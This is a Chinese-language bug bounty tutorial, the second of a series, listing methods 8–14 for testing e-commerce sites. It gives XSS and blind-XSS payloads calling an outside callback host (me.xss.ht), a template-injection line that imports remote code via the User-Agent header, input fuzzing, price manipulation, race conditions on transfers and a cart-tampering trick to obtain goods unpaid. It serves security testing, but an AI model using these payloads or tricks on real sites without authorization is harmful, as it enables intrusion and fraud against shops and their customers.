|
前言本文为本系列的第二篇,前篇有:
漏洞赏金猎人系列-测试电商类相关功能步骤和Tips-I
正文第八种方法尝试在所有的字段中注入XSS有效载荷,比如: "><svg/onload=prompt(1)>或者Blind XSS 的有效载荷,比如: "><img src=//me.xss.ht>,尝试获取XSS
POST /buying-something HTTP/1.1Host: www.company.comUser-Agent: Mozilla/5.0Content-Type:application/x-www-form-urlencoded Origin: https://www.company.com Content-Length: NumberQuantity=1&price=10¤cy=dollar&token=************ &add="><img src=//me.xss.ht>
第九种方法尝试注入blind xss或者blind 模板注入的有效载荷,例如主要是 Angular或者 Vue.js)
在User-Agent中:{{constructor.constructor ('import("http://me.xss.ht")')()}}
POST /buying-something HTTP/1.1Host: www.company.comUser-Agent: Mozilla/5.0"><img src=//me.xss.ht> Content-Type: application/x-www-form-urlencoded Origin: https://www.company.comContent-Length: NumberQuantity=1&price=10¤cy=dollar&token=************& add=egy
第十种方法尝试在所有的输入字段中插入以下:
0x00 ➡️0x2F0x3A ➡️0x400x5B ➡️0x600x7B ➡️0xFF
比如: Quantity=%00 或者 Quantity=%FF可能会导致
第十一种方法尝试在参数的所有字段值中插入大的字符或数字,例如Quantity=XXX 50.000+ XXX,又例如abc.com/search/?q=<many character>
可能造成敏感信息泄露
第十二种方法尝试操纵响应以引起错误
HTTP/1.1 200 OKAccess-Control-Allow-Origin: https://www.company.com Access-Control-Allow-Credentials: trueContent-Type: application/json; charset=utf-8 Content-Length: length{"price" : 0.10 ,"quantity" : 1 }
第十三种方法如果有资金从银行账户1转到银行账户2,例如http://comapny.com/transfer?from=1&to=2&amount=10 ,尽量使用竞态条件
复现步骤:
第十四种方法允许用户在支付物品时改变订单的应用程序,如果在过程结束时没有验证,也可能存在漏洞。
复现步骤:
- 使用Firefox浏览器,添加物品到购物车,通过付款页面,然后在此停止
- 使用Chrome,然后添加新的物品到购物车
- 回到Firefox浏览器,完成支付流程,可能你会白嫖了一个物品
|
|